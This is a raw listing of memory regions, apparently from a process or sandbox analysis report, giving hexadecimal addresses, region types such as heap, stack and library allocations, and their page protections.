1FC80013000
trusted library allocation
page read and write
23FDC4BC000
heap
page read and write
1E079D4B000
heap
page read and write
251FD4D8000
heap
page read and write
7FF7B39D0000
trusted library allocation
page read and write
E68000
heap
page read and write
1275170C000
heap
page read and write
214A9C88000
heap
page read and write
288CCE01000
heap
page read and write
1C513871000
heap
page read and write
214ABF2D000
trusted library allocation
page read and write
182D186C000
heap
page read and write
2C443C30000
heap
page read and write
1070000
trusted library allocation
page read and write
1E07BCE5000
heap
page read and write
2069465D000
heap
page read and write
22D6C88C000
heap
page read and write
2159CD0B000
heap
page read and write
2159D04E000
heap
page read and write
AF7000
stack
page read and write
206945F5000
heap
page read and write
2159CB91000
heap
page read and write
202B071C000
heap
page read and write
20187A24000
heap
page read and write
1EC84E59000
trusted library allocation
page read and write
258D1AB0000
heap
page read and write
16080860000
heap
page read and write
203DED2A000
trusted library allocation
page read and write
2276E01B000
heap
page read and write
2276E35F000
heap
page read and write
12751705000
heap
page read and write
7FF7B3990000
trusted library allocation
page execute and read and write
21B6195F000
heap
page read and write
377957E000
stack
page read and write
203DC9D1000
heap
page read and write
38D64FE000
stack
page read and write
5039FFE000
stack
page read and write
212F3BAC000
heap
page read and write
214A9CDC000
heap
page read and write
180C4C3A000
heap
page read and write
4ED0000
heap
page execute and read and write
7FF7B3AD0000
trusted library allocation
page read and write
1AF1A3BC000
trusted library allocation
page read and write
E84000
heap
page read and write
1EE96CF8000
heap
page read and write
2159CF50000
heap
page read and write
AC9B6FF000
stack
page read and write
21B618A1000
heap
page read and write
7FF7B38B0000
trusted library allocation
page execute and read and write
1E079FE5000
heap
page read and write
173E37E000
stack
page read and write
7FF7B387C000
trusted library allocation
page execute and read and write
214A9CC0000
heap
page read and write
1E07B7E2000
heap
page read and write
22D548C0000
trusted library allocation
page read and write
1EE96C0E000
heap
page read and write
203DEF87000
trusted library allocation
page read and write
203DCA17000
heap
page read and write
2276E136000
heap
page read and write
1030000
trusted library allocation
page execute and read and write
23FDC3E8000
heap
page read and write
2C443890000
heap
page read and write
22C26CB8000
heap
page read and write
288CCEBF000
heap
page read and write
212F3BC8000
heap
page read and write
1710000
trusted library allocation
page read and write
23FDA40A000
heap
page read and write
251FD4DD000
heap
page read and write
237B3230000
trusted library allocation
page read and write
1C0C9E20000
heap
page read and write
201879FE000
heap
page read and write
7FF7B37F4000
trusted library allocation
page read and write
37799BC000
stack
page read and write
288CCB75000
heap
page read and write
1EE877D000
stack
page read and write
F256DFE000
stack
page read and write
1EE96BFA000
heap
page read and write
212F1C90000
heap
page read and write
1EE96F3C000
heap
page read and write
1EE96CFF000
heap
page read and write
38D6143000
stack
page read and write
953CAFF000
stack
page read and write
745AE7E000
stack
page read and write
EF1F0FF000
stack
page read and write
2159CF35000
heap
page read and write
1EE96BE7000
heap
page read and write
21700414000
trusted library allocation
page read and write
1EC82B80000
heap
page read and write
180C2ED5000
heap
page read and write
2159CBF2000
heap
page read and write
212F3F9E000
heap
page read and write
217102F2000
trusted library allocation
page read and write
BC555DE000
stack
page read and write
9466F5E000
stack
page read and write
23FDC3C9000
heap
page read and write
258D3A3D000
heap
page read and write
22A5D3B0000
heap
page read and write
201877DD000
heap
page read and write
1EE94D28000
heap
page read and write
7FF7B3A60000
trusted library allocation
page read and write
1EC82E10000
trusted library allocation
page read and write
202B071F000
heap
page read and write
1AF18850000
trusted library allocation
page read and write
1EE94DE3000
heap
page read and write
2159AD7F000
heap
page read and write
288CCA43000
heap
page read and write
1F0D12E0000
heap
page read and write
258D3933000
heap
page read and write
AC9B1FE000
stack
page read and write
2D81000
trusted library allocation
page read and write
206945F5000
heap
page read and write
21B6175D000
heap
page read and write
212F3CC8000
heap
page read and write
1EE8D3E000
stack
page read and write
22A5F3FB000
heap
page read and write
2159ACD7000
heap
page read and write
12EBD990000
heap
page execute and read and write
212F3E26000
heap
page read and write
1EE96F73000
heap
page read and write
1D93BD9B000
heap
page read and write
1E07BF3B000
heap
page read and write
2159CC91000
heap
page read and write
2018778C000
heap
page read and write
745A9FE000
stack
page read and write
3779ABE000
stack
page read and write
1EC82DE6000
heap
page read and write
202B262F000
trusted library allocation
page read and write
20187A1B000
heap
page read and write
2C445570000
heap
page read and write
53DC9C2000
stack
page read and write
212F3E2C000
heap
page read and write
182D18A8000
heap
page read and write
AC000BE000
unkown
page read and write
22A5F431000
heap
page read and write
CAB32FD000
stack
page read and write
38D65FE000
stack
page read and write
23FDC3C1000
heap
page read and write
258D3943000
heap
page read and write
12EBB910000
heap
page read and write
182D17DE000
heap
page read and write
2069465B000
heap
page read and write
7FF7B39A2000
trusted library allocation
page read and write
22C26C98000
heap
page read and write
127534A1000
trusted library allocation
page read and write
53DD3BB000
stack
page read and write
1F0D13E0000
heap
page read and write
2069464E000
heap
page read and write
2069462F000
heap
page read and write
2069468F000
heap
page read and write
2276C150000
heap
page read and write
173E57E000
stack
page read and write
173E273000
stack
page read and write
202B0610000
heap
page read and write
1D93DD2E000
trusted library allocation
page read and write
258D3943000
heap
page read and write
1AF190D4000
trusted library allocation
page read and write
22D55128000
trusted library allocation
page read and write
173E6BE000
stack
page read and write
2069465F000
heap
page read and write
212F3CF8000
heap
page read and write
237B32A2000
trusted library allocation
page read and write
288CCA7E000
heap
page read and write
C806AFF000
stack
page read and write
22A5F09A000
heap
page read and write
2276DFA0000
heap
page read and write
1F0D131E000
heap
page read and write
212F3E57000
heap
page read and write
212F3D0D000
heap
page read and write
7DF13CD000
stack
page read and write
21B614F2000
heap
page read and write
1AF16F40000
heap
page read and write
2C443AE0000
heap
page read and write
20187A34000
heap
page read and write
202B2160000
heap
page read and write
20185828000
heap
page read and write
201876FD000
heap
page read and write
1F0D12B0000
heap
page read and write
1EE96E4B000
heap
page read and write
7FF7B3A60000
trusted library allocation
page read and write
1E07B7D2000
heap
page read and write
22D528A2000
heap
page read and write
2276DFBD000
heap
page read and write
7FF7B39E0000
trusted library allocation
page execute and read and write
20187A38000
heap
page read and write
1D93D885000
heap
page read and write
1C0C9A9F000
heap
page read and write
1C0C9A80000
heap
page read and write
201876FB000
heap
page read and write
22A5D1E9000
heap
page read and write
251FD3A9000
heap
page read and write
20187682000
heap
page read and write
21B61739000
heap
page read and write
180C4C3A000
heap
page read and write
745ACFC000
stack
page read and write
D977DFE000
stack
page read and write
258D1B8A000
heap
page read and write
22D54977000
trusted library allocation
page read and write
212F3EA1000
heap
page read and write
1D93DDF4000
trusted library allocation
page read and write
206945DC000
heap
page read and write
20187240000
heap
page read and write
258D1E25000
heap
page read and write
258D39F0000
heap
page read and write
BC55CFE000
stack
page read and write
CAB35FB000
stack
page read and write
1E07C05E000
heap
page read and write
2C445576000
heap
page read and write
EF1F4FE000
stack
page read and write
217003E5000
trusted library allocation
page read and write
1E07BD9A000
heap
page read and write
258D1AD8000
heap
heap
page read and write
1EE96B90000
heap
page read and write
2069465F000
heap
page read and write
23FDC317000
heap
page read and write
1C0C9A40000
heap
page read and write
22D54C50000
trusted library allocation
page read and write
2276DF07000
heap
page read and write
D6C4CFE000
stack
page read and write
BC55B79000
stack
page read and write
1E07BF4D000
heap
page read and write
7FF7B3A30000
trusted library allocation
page read and write
16082D73000
trusted library allocation
page read and write
258D3BF1000
heap
page read and write
23FDC2D2000
heap
page read and write
7FF7B3A50000
trusted library allocation
page read and write
745B8CE000
stack
page read and write
288CCB48000
heap
page read and write
214A9CBA000
heap
page read and write
1EC82E30000
trusted library allocation
page read and write
237B32A0000
trusted library allocation
page read and write
20694651000
heap
page read and write
21B5F7E6000
heap
page read and write
1E07BF5F000
heap
page read and write
1F0D12E9000
heap
page read and write
22C26CFA000
heap
page read and write
147E000
stack
page read and write
BBB617F000
stack
page read and write
1E07BCED000
heap
page read and write
E3B000
trusted library allocation
page execute and read and write
1F0D11D0000
heap
page read and write
2817FFB000
stack
page read and write
180C471E000
heap
page read and write
288CCB01000
heap
page read and write
12751679000
heap
page read and write
7FF7B37FD000
trusted library allocation
page execute and read and write
12EBB8A0000
heap
page read and write
2069466D000
heap
page read and write
251FD6A1000
heap
page read and write
FBB000
stack
page read and write
21B5F7F3000
heap
page read and write
2276E252000
heap
page read and write
1EC84E64000
trusted library allocation
page read and write
288CCA5C000
heap
page read and write
1609A9A7000
heap
page execute and read and write
2276E15B000
heap
page read and write
212F3E27000
heap
page read and write
2C445EC0000
trusted library allocation
page read and write
64771FF000
stack
page read and write
258D3CC3000
heap
page read and write
7DF49EF70000
trusted library allocation
page execute and read and write
16EA000
trusted library allocation
page execute and read and write
1D93D880000
heap
page read and write
2159AEC0000
heap
page read and write
12751600000
heap
page read and write
1EE96BF2000
heap
page read and write
23FDC5B6000
heap
page read and write
7FF7B38D6000
trusted library allocation
page execute and read and write
1EE96E38000
heap
page read and write
2276E292000
heap
page read and write
258D1A40000
heap
page read and write
38D67BE000
stack
page read and write
7FF7B37F3000
trusted library allocation
page execute and read and write
1276B750000
heap
page read and write
22A5F4EF000
heap
page read and write
1E07B7F7000
heap
page read and write
1609A84B000
heap
page read and write
206945F2000
heap
page read and write
288CABCE000
heap
page read and write
22A5F4EE000
heap
page read and write
1EC8612E000
trusted library allocation
page read and write
20185730000
heap
page read and write
180C4713000
heap
page read and write
12753441000
trusted library allocation
page read and write
1E07B7D7000
heap
page read and write
251FB5C0000
heap
page read and write
14BF7FD000
stack
page read and write
1AF190BF000
trusted library allocation
page read and write
EEE11FE000
stack
page read and write
258D3918000
heap
page read and write
1D93BE5B000
heap
page read and write
1EE96C9C000
heap
page read and write
F2567FE000
stack
page read and write
212F3F6D000
heap
page read and write
21B6162A000
heap
page read and write
1AF31154000
heap
page read and write
258D1ADE000
heap
page read and write
E14000
trusted library allocation
page read and write
1D94DD00000
trusted library allocation
page read and write
7FF7B38AC000
trusted library allocation
page execute and read and write
288CCA7E000
heap
page read and write
258D3A6A000
heap
page read and write
7FF681C03000
unkown
page readonly
D6C513B000
stack
page read and write
1EC84E4F000
trusted library allocation
page read and write
BC55A7E000
stack
page read and write
180C2C68000
heap
page read and write
21B5F6F0000
heap
page read and write
1275166B000
heap
page read and write
1C513830000
heap
page read and write
1E07BD19000
heap
page read and write
180C2ED0000
heap
page read and write
1C0C9A71000
heap
page read and write
1E07BF4A000
heap
page read and write
214A9F10000
trusted library allocation
page read and write
214AC13B000
trusted library allocation
page read and write
318E000
stack
page read and write
180C471E000
heap
page read and write
53DD13E000
stack
page read and write
212F1C98000
heap
page read and write
12EBDEFF000
trusted library allocation
page read and write
251FD3AB000
heap
page read and write
212F3F6D000
heap
page read and write
1E07BE96000
heap
page read and write
206945CF000
heap
page read and write
180C4BAD000
heap
page read and write
258D38F3000
heap
page read and write
22A5F082000
heap
page read and write
2276DF1D000
heap
page read and write
251FD40F000
heap
page read and write
953D0FD000
stack
page read and write
2276DF02000
heap
page read and write
180C46D6000
heap
page read and write
21B61846000
heap
page read and write
258D396E000
heap
page read and write
258D3913000
heap
page read and write
212F3E25000
heap
page read and write
377947F000
stack
page read and write
2069462F000
heap
page read and write
251FD3F7000
heap
page read and write
1AF16EE0000
heap
page read and write
3195000
trusted library allocation
page read and write
288CCDC0000
heap
page read and write
20185836000
heap
page read and write
20694665000
heap
page read and write
258D3CA7000
heap
page read and write
288CCD01000
heap
page read and write
180C46A0000
heap
page read and write
2276E149000
heap
page read and write
251FD4C8000
heap
page read and write
D6C4742000
stack
page read and write
288CCA53000
heap
page read and write
19680013000
trusted library allocation
page read and write
21700633000
trusted library allocation
page read and write
21B6162A000
heap
page read and write
22D528BF000
heap
page read and write
2159D04E000
heap
page read and write
46217E000
stack
page read and write
AC7FEFE000
stack
page read and write
288CCB81000
heap
page read and write
DC0000
heap
page read and write
7FF7B3AC0000
trusted library allocation
page read and write
203DCBB0000
trusted library allocation
page read and write
212F3D08000
heap
page read and write
53DCDFE000
stack
page read and write
7FF7B3B10000
trusted library allocation
page read and write
212F3BE8000
heap
page read and write
21B6162A000
heap
page read and write
1EC849E0000
trusted library allocation
page read and write
1D93DD3B000
trusted library allocation
page read and write
4F70000
heap
page read and write
1E07B799000
heap
page read and write
22C26BD7000
heap
page read and write
1760000
heap
page read and write
2069462D000
heap
page read and write
22D52820000
heap
page read and write
20187913000
heap
page read and write
21B615A0000
heap
page read and write
CAB30FF000
stack
page read and write
180C4E3D000
heap
page read and write
1E07B793000
heap
page read and write
1608291C000
trusted library allocation
page read and write
2069465B000
heap
page read and write
22A5D3B5000
heap
page read and write
22A5D1EA000
heap
page read and write
1C513927000
heap
page read and write
20187A41000
heap
page read and write
23FDC33D000
heap
page read and write
127515C0000
heap
page read and write
22C26CFA000
heap
page read and write
1E07BF72000
heap
page read and write
1608290D000
trusted library allocation
page read and write
2159CC90000
heap
page read and write
182D18E8000
heap
page read and write
214A9F40000
heap
page read and write
180C2C76000
heap
page read and write
1E07B80B000
heap
page read and write
212F3E34000
heap
page read and write
B88BCFD000
stack
page read and write
22D54335000
heap
page read and write
1E07BD0D000
heap
page read and write
7FF7B3A10000
trusted library allocation
page read and write
1E07BCE8000
heap
page read and write
22A5F131000
heap
page read and write
2069462D000
heap
page read and write
20694550000
remote allocation
page read and write
214A9D03000
heap
page read and write
251FD76E000
heap
page read and write
21B61739000
heap
page read and write
1E07BF1E000
heap
page read and write
2276BF60000
heap
page read and write
288CCB7D000
heap
page read and write
206945E0000
heap
page read and write
94677BF000
stack
page read and write
2F6E1B8000
stack
page read and write
182D18C8000
heap
page read and write
4A36F7E000
stack
page read and write
1EE96BA7000
heap
page read and write
1AF311B7000
heap
page read and write
7FF7B398A000
trusted library allocation
page read and write
EEE1DCD000
stack
page read and write
2018787A000
heap
page read and write
23FDA5D0000
heap
page read and write
F2561AA000
stack
page read and write
23FDC673000
heap
page read and write
21B5F7F7000
heap
page read and write
22A5F22A000
heap
page read and write
212F3CBD000
heap
page read and write
16F7000
trusted library allocation
page execute and read and write
203DEF81000
trusted library allocation
page read and write
2159CCAD000
heap
page read and write
251FD3A3000
heap
page read and write
212F3BF3000
heap
page read and write
20187A1B000
heap
page read and write
2170169D000
trusted library allocation
page read and write
251FD59C000
heap
page read and write
23FDC4BA000
heap
page read and write
461F79000
stack
page read and write
288CAC4A000
heap
page read and write
258D1AEF000
heap
page read and write
203DF0D6000
trusted library allocation
page read and write
20694659000
heap
page read and write
182D188D000
heap
page read and write
201877ED000
heap
page read and write
212F3CCD000
heap
page read and write
2276E35F000
heap
page read and write
461E79000
stack
page read and write
2F6DEFE000
stack
page read and write
44D1AFE000
stack
page read and write
182D1888000
heap
page read and write
294E000
stack
page read and write
22C26B87000
heap
page read and write
1AF18810000
trusted library allocation
page read and write
180C46AB000
heap
page read and write
251FB7C0000
heap
page read and write
1EE96F3A000
heap
page read and write
258D3C8B000
heap
page read and write
212F3CB1000
heap
page read and write
1AF18830000
trusted library allocation
page read and write
2276E285000
heap
page read and write
1EE94CD0000
heap
page read and write
1AF1A393000
trusted library allocation
page read and write
22D54981000
trusted library allocation
page read and write
1C513877000
heap
page read and write
251FD76E000
heap
page read and write
180C4C3A000
heap
page read and write
7FF7B37F2000
trusted library allocation
page read and write
23FDC312000
heap
page read and write
1E07BF54000
heap
page read and write
1EE96F73000
heap
page read and write
203DF0DF000
trusted library allocation
page read and write
23FDA417000
heap
page read and write
16080760000
heap
page read and write
B88BEF9000
stack
page read and write
EEE117E000
stack
page read and write
1C0C9AE7000
heap
page read and write
1D93E390000
trusted library allocation
page read and write
288CCA6B000
heap
page read and write
2159CD09000
heap
page read and write
2018768A000
heap
page read and write
2069462D000
heap
page read and write
7FF7B397A000
trusted library allocation
page read and write
180C4702000
heap
page read and write
288CCB85000
heap
page read and write
BBB637E000
stack
page read and write
7FF7B39C0000
trusted library allocation
page read and write
22A5F0AE000
heap
page read and write
B88BDFE000
stack
page read and write
203DED90000
trusted library allocation
page read and write
22D52A50000
heap
page read and write
251FD85E000
heap
page read and write
7FF7B3A6C000
trusted library allocation
page read and write
7FF7B388C000
trusted library allocation
page execute and read and write
D6C4C7E000
stack
page read and write
1E07BF72000
heap
page read and write
B88BD7E000
stack
page read and write
2159CC0E000
heap
page read and write
1F0D364B000
trusted library allocation
page read and write
C8073FB000
stack
page read and write
22A5F03B000
heap
page read and write
201876F6000
heap
page read and write
288CCA43000
heap
page read and write
2276DF1D000
heap
page read and write
258D1AE5000
heap
page read and write
1E07BE96000
heap
page read and write
7FF7B39E0000
trusted library allocation
page execute and read and write
1EE96B94000
heap
page read and write
1EE9704F000
heap
page read and write
1C515250000
heap
page read and write
2C445B03000
trusted library allocation
page read and write
22C26C71000
heap
page read and write
20187980000
heap
page read and write
7DF02FE000
stack
page read and write
2159CC03000
heap
page read and write
1D93BDE1000
heap
page read and write
180C46A5000
heap
page read and write
251FD4A0000
heap
page read and write
2159CBF7000
heap
page read and write
21B61739000
heap
page read and write
22A5F158000
heap
page read and write
1D955ED6000
heap
page read and write
20694600000
heap
page read and write
1AF1A656000
trusted library allocation
page read and write
258D396C000
heap
page read and write
3FC0BFE000
stack
page read and write
2069462D000
heap
page read and write
1EE94D35000
heap
page read and write
23FDC2C5000
heap
page read and write
258D3CA0000
heap
page read and write
206945F3000
heap
page read and write
251FD756000
heap
page read and write
1EE96F3E000
heap
page read and write
201876D2000
heap
page read and write
258D1AEC000
heap
page read and write
23FDC302000
heap
page read and write
22A5D155000
heap
page read and write
237B190D000
heap
page read and write
44D17FD000
stack
page read and write
2159CBC6000
heap
page read and write
1AF16F35000
heap
page read and write
258D3948000
heap
page read and write
745A8FF000
stack
page read and write
212F1CC5000
heap
page read and write
7FF7B3B53000
trusted library allocation
page read and write
6B3EBFF000
stack
page read and write
127634BB000
trusted library allocation
page read and write
21B614F7000
heap
page read and write
20694680000
heap
page read and write
1C0CC05B000
trusted library allocation
page read and write
212F3C1E000
heap
page read and write
AC005BC000
stack
page read and write
212F3F7B000
heap
page read and write
1F0D3643000
trusted library allocation
page read and write
1EE96D1A000
heap
page read and write
251FD416000
heap
page read and write
1276B6A0000
heap
page execute and read and write
127515C5000
heap
page read and write
AC7FF7C000
stack
page read and write
201857F5000
heap
page read and write
206945CF000
heap
page read and write
7FF7B3B10000
trusted library allocation
page read and write
1E07BF49000
heap
page read and write
1040000
heap
page read and write
251FD4A1000
heap
page read and write
1EC864D8000
trusted library allocation
page read and write
23FDC3ED000
heap
page read and write
201877C5000
heap
page read and write
22C26CB5000
heap
page read and write
4617DE000
stack
page read and write
1EE94DE4000
heap
page read and write
237B18D2000
heap
page read and write
21B6187D000
heap
page read and write
2F6DE7D000
stack
page read and write
E37000
trusted library allocation
page execute and read and write
212F3F4E000
heap
page read and write
3D81000
trusted library allocation
page read and write
6B3FBCF000
stack
page read and write
22C26BED000
heap
page read and write
791C9FE000
stack
page read and write
22C26CEB000
heap
page read and write
1EE96E1E000
heap
page read and write
7FF7B39E0000
trusted library allocation
page read and write
21B6175B000
heap
page read and write
21B614A2000
heap
page read and write
288CABBF000
heap
page read and write
21B6184A000
heap
page read and write
22A5F3D9000
heap
page read and write
7FF7B3990000
trusted library allocation
page execute and read and write
22D548C4000
trusted library allocation
page read and write
237B3701000
trusted library allocation
page read and write
1D955E26000
heap
page execute and read and write
2069462D000
heap
page read and write
377A68D000
stack
page read and write
251FD4CD000
heap
page read and write
21B5F7E5000
heap
page read and write
2C4438A0000
heap
page read and write
212F3CFD000
heap
page read and write
12753556000
trusted library allocation
page read and write
7FF7B3A10000
trusted library allocation
page read and write
7FF7B3A90000
trusted library allocation
page read and write
237B3C53000
trusted library allocation
page read and write
BC55D7E000
stack
page read and write
1F0D133C000
heap
page read and write
237B3D5C000
trusted library allocation
page read and write
288CCA18000
heap
page read and write
1608092D000
heap
page read and write
1F0D1367000
heap
page read and write
12EBDF42000
trusted library allocation
page read and write
258D3938000
heap
page read and write
212F3FA1000
heap
page read and write
212F3D15000
heap
page read and write
2276E01D000
heap
page read and write
22A5F3FB000
heap
page read and write
258D391C000
heap
page read and write
212F3CDD000
heap
page read and write
288CCB3D000
heap
page read and write
2276DF1C000
heap
page read and write
258D1A30000
heap
page read and write
2159CCED000
heap
page read and write
EF1EDFE000
stack
page read and write
127534DC000
trusted library allocation
page read and write
D9778FF000
stack
page read and write
1D955F0B000
heap
page read and write
212F3C1E000
heap
page read and write
1C0CBE44000
trusted library allocation
page read and write
16FB000
trusted library allocation
page execute and read and write
2276E23B000
heap
page read and write
20694661000
heap
page read and write
EEE091F000
stack
page read and write
1AF1962C000
trusted library allocation
page read and write
214ABC8C000
trusted library allocation
page read and write
21B6160D000
heap
page read and write
182D18DB000
heap
page read and write
217003DA000
trusted library allocation
page read and write
4A373B8000
stack
page read and write
12EBBC40000
heap
page read and write
180C4DFE000
heap
page read and write
E03000
trusted library allocation
page execute and read and write
251FD76E000
heap
page read and write
22C26B71000
heap
page read and write
2159CB99000
heap
page read and write
1E07B80E000
heap
page read and write
56FF000
stack
page read and write
1EE94D36000
heap
page read and write
23FDC2C2000
heap
page read and write
D6C4AFE000
stack
page read and write
160808F0000
heap
page read and write
288CCB79000
heap
page read and write
1E07BF56000
heap
page read and write
212F3D25000
heap
page read and write
180C4B88000
heap
page read and write
1D955E66000
heap
page read and write
1D93BDE6000
heap
page read and write
203DE9D0000
trusted library allocation
page read and write
1D93E2B2000
trusted library allocation
page read and write
22A5D0E0000
heap
page read and write
180C46A2000
heap
page read and write
180C4B78000
heap
page read and write
2159CD8A000
heap
page read and write
FED000
stack
page read and write
4E7E000
stack
page read and write
2159CB96000
heap
page read and write
7FF7B39F0000
trusted library allocation
page read and write
1FC8040F000
trusted library allocation
page read and write
7FF7B39F0000
trusted library allocation
page read and write
12EBD510000
heap
page read and write
53DDE8D000
stack
page read and write
1EE96BC2000
heap
page read and write
22A5F1A4000
heap
page read and write
2069465F000
heap
page read and write
2276DF1D000
heap
page read and write
22D52AC0000
heap
page readonly
180C4E0B000
heap
page read and write
38D61CF000
stack
page read and write
22D542F0000
trusted library allocation
page read and write
217016C8000
trusted library allocation
page read and write
214A9F45000
heap
page read and write
53DCE7E000
stack
page read and write
1D93E1A4000
trusted library allocation
page read and write
2159CB90000
heap
page read and write
2F6DD7F000
stack
page read and write
BBB62FE000
stack
page read and write
2159CCA1000
heap
page read and write
1C0CB480000
trusted library allocation
page read and write
203DC9A2000
heap
page read and write
1AF310FE000
heap
page read and write
212F3F53000
heap
page read and write
1EE96E18000
heap
page read and write
12753A03000
trusted library allocation
page read and write
23FDC307000
heap
page read and write
22A5F0A3000
heap
page read and write
180C4BB9000
heap
page read and write
1EE94DBB000
heap
page read and write
2170062D000
trusted library allocation
page read and write
214ABB70000
heap
page execute and read and write
127515D0000
heap
page read and write
1EE96D0D000
heap
page read and write
1C5137E0000
heap
page read and write
1E07B7BA000
heap
page read and write
1C5137B0000
heap
page read and write
214ABB81000
trusted library allocation
page read and write
1AF30EB4000
heap
page read and write
180C46C6000
heap
page read and write
21B614E7000
heap
page read and write
22D5289C000
heap
page read and write
2069468F000
heap
page read and write
1340000
heap
page read and write
23FDC327000
heap
page read and write
214AB705000
heap
page read and write
258D3908000
heap
page read and write
791CCFD000
stack
page read and write
12EBBB90000
trusted library allocation
page read and write
23FDC66E000
heap
page read and write
12EBBB40000
trusted library allocation
page read and write
214ABC0B000
trusted library allocation
page read and write
1C0CC060000
trusted library allocation
page read and write
1AF1A8D8000
trusted library allocation
page read and write
258D3BF0000
heap
page read and write
258D3A0D000
heap
page read and write
94676B9000
stack
page read and write
16E0000
trusted library allocation
page read and write
AC9B7FB000
stack
page read and write
22A5F030000
heap
page read and write
C76000
heap
page read and write
2159CD04000
heap
page read and write
1D93DE34000
trusted library allocation
page read and write
288CCA48000
heap
page read and write
23FDC2F1000
heap
page read and write
2276C05A000
heap
page read and write
22C26BDA000
heap
page read and write
288CABBA000
heap
page read and write
23FDC42D000
heap
page read and write
2276DEAB000
heap
page read and write
182D1778000
heap
page read and write
1EE96E4B000
heap
page read and write
23FDC2F6000
heap
page read and write
20187A2E000
heap
page read and write
2276E148000
heap
page read and write
2C445A0E000
heap
page read and write
16080A20000
trusted library allocation
page read and write
EEE0C7E000
stack
page read and write
1EE8BBE000
stack
page read and write
258D3A2D000
heap
page read and write
20187A4D000
heap
page read and write
182D18D8000
heap
page read and write
1E07B79B000
heap
page read and write
1D93DDED000
trusted library allocation
page read and write
1609AAB0000
heap
page read and write
20187935000
heap
page read and write
202B06FE000
heap
page read and write
168F000
stack
page read and write
214ABBC0000
trusted library allocation
page read and write
1AF1A5D0000
trusted library allocation
page read and write
23FDC4BA000
heap
page read and write
2276E139000
heap
page read and write
22D528A6000
heap
page read and write
21B5F560000
heap
page read and write
203DED39000
trusted library allocation
page read and write
1F0D32E1000
trusted library allocation
page read and write
212F3E43000
heap
page read and write
182D1780000
heap
page read and write
E04000
trusted library allocation
page read and write
20187902000
heap
page read and write
1F0D307C000
heap
page read and write
212F1FC5000
heap
page read and write
21B5F710000
heap
page read and write
1276B970000
heap
page read and write
1F0D3639000
trusted library allocation
page read and write
258D1B7E000
heap
page read and write
1D93DD4F000
trusted library allocation
page read and write
1D955EB4000
heap
page read and write
288CCD7E000
heap
page read and write
2069462F000
heap
page read and write
22A5F40B000
heap
page read and write
1D93DDF0000
trusted library allocation
page read and write
20187A41000
heap
page read and write
20187906000
heap
page read and write
21B5F7CC000
heap
page read and write
573D000
stack
page read and write
1EE96B9B000
heap
page read and write
953CBFF000
stack
page read and write
22A5F044000
heap
page read and write
14B0000
heap
page read and write
2159AD70000
heap
page read and write
258D3923000
heap
page read and write
202B0660000
heap
page read and write
745AD7F000
stack
page read and write
1E07BCE8000
heap
page read and write
1870000
trusted library allocation
page execute and read and write
1F0D3878000
trusted library allocation
page read and write
182D18D4000
heap
page read and write
23FDC2F1000
heap
page read and write
22C26C9D000
heap
page read and write
1E07B80E000
heap
page read and write
1C0CBE18000
trusted library allocation
page read and write
180C4B7D000
heap
page read and write
23FDC3DD000
heap
page read and write
2276E254000
heap
page read and write
2069462D000
heap
page read and write
237B18C9000
heap
page read and write
214ABB91000
trusted library allocation
page read and write
20187683000
heap
page read and write
22C26BBB000
heap
page read and write
258D3DAF000
heap
page read and write
22A5F3EF000
heap
page read and write
7FF7B39B0000
trusted library allocation
page execute and read and write
21B6172C000
heap
page read and write
1AF28CF1000
trusted library allocation
page read and write
1AF311B5000
heap
page read and write
1EC84E93000
trusted library allocation
page read and write
2276DEC2000
heap
page read and write
22C26BA2000
heap
page read and write
2F6EE0E000
stack
page read and write
377A60E000
stack
page read and write
1EC86166000
trusted library allocation
page read and write
1D93E0EC000
trusted library allocation
page read and write
22C26BED000
heap
page read and write
182D1788000
heap
page read and write
160828C4000
trusted library allocation
page read and write
7FF7B37C3000
trusted library allocation
page execute and read and write
4A3753E000
stack
page read and write
F2565FE000
stack
page read and write
23FDC312000
heap
page read and write
1C0C9AA7000
heap
page read and write
288CABB9000
heap
page read and write
22C26BC7000
heap
page read and write
258D3CA7000
heap
page read and write
1E07BEA0000
heap
page read and write
7FF7B3AF0000
trusted library allocation
page read and write
21B5F738000
heap
page read and write
23FDC63E000
heap
page read and write
1FC800C1000
trusted library allocation
page read and write
BBB673E000
stack
page read and write
288CCA08000
heap
page read and write
BC55EFB000
stack
page read and write
88BB5FE000
stack
page read and write
2F6E0BF000
stack
page read and write
22A5F050000
heap
page read and write
1C0CBE3F000
trusted library allocation
page read and write
1AF31000000
heap
page read and write
2276E00D000
heap
page read and write
14BF5FE000
stack
page read and write
23FDC312000
heap
page read and write
201876C7000
heap
page read and write
1C5156A7000
heap
page execute and read and write
4A375BC000
stack
page read and write
237B32E0000
heap
page execute and read and write
23FDA49B000
heap
page read and write
1EE96BD2000
heap
page read and write
258D3CC3000
heap
page read and write
E8B000
heap
page read and write
22A5D147000
heap
page read and write
212F3E27000
heap
page read and write
1EC84A81000
trusted library allocation
page read and write
180C2CFA000
heap
page read and write
1EE96E91000
heap
page read and write
1EC82C45000
heap
page read and write
288CCB28000
heap
page read and write
23FDC322000
heap
page read and write
180C4E3E000
heap
page read and write
7DF06F8000
stack
page read and write
237B33B0000
heap
page read and write
22D54891000
trusted library allocation
page read and write
D6C4FBE000
stack
page read and write
251FD756000
heap
page read and write
1F0D12D0000
heap
page read and write
20694530000
heap
page read and write
12EBBBD0000
trusted library allocation
page read and write
1EE96D0B000
heap
page read and write
1EC84E6C000
trusted library allocation
page read and write
203DCC70000
heap
page read and write
258D3DAF000
heap
page read and write
2159CB93000
heap
page read and write
2276E285000
heap
page read and write
180C4C3A000
heap
page read and write
180C470A000
heap
page read and write
196803CE000
trusted library allocation
page read and write
22D54E51000
trusted library allocation
page read and write
1E07B7C1000
heap
page read and write
7FF681B4C000
unkown
page readonly
1860000
heap
page read and write
2069466D000
heap
page read and write
2276DEA4000
heap
page read and write
21B614AB000
heap
page read and write
88BAFFE000
stack
page read and write
2276E285000
heap
heap
page read and write
288CAC4A000
heap
page read and write
23FDA409000
heap
page read and write
1AF16DE0000
heap
page read and write
461DFE000
stack
page read and write
182D18A8000
heap
page read and write
1EC84CA8000
trusted library allocation
page read and write
21B6175B000
heap
page read and write
1EE980D000
stack
page read and write
251FD508000
heap
page read and write
20187A32000
heap
page read and write
2276E1A1000
heap
page read and write
22C26CD8000
heap
page read and write
182D1793000
heap
page read and write
1C0CBA43000
trusted library allocation
page read and write
2159CF47000
heap
page read and write
1EE96C07000
heap
page read and write
7FF7B3A72000
trusted library allocation
page read and write
1EC84A70000
heap
page execute and read and write
1AF18860000
heap
page read and write
251FD76E000
heap
page read and write
180C4B40000
heap
page read and write
7DEFFAF000
stack
page read and write
7FF7B3A80000
trusted library allocation
page read and write
22C26B97000
heap
page read and write
C806BFE000
stack
page read and write
182D187D000
heap
page read and write
1AF30F30000
heap
page read and write
182D18E8000
heap
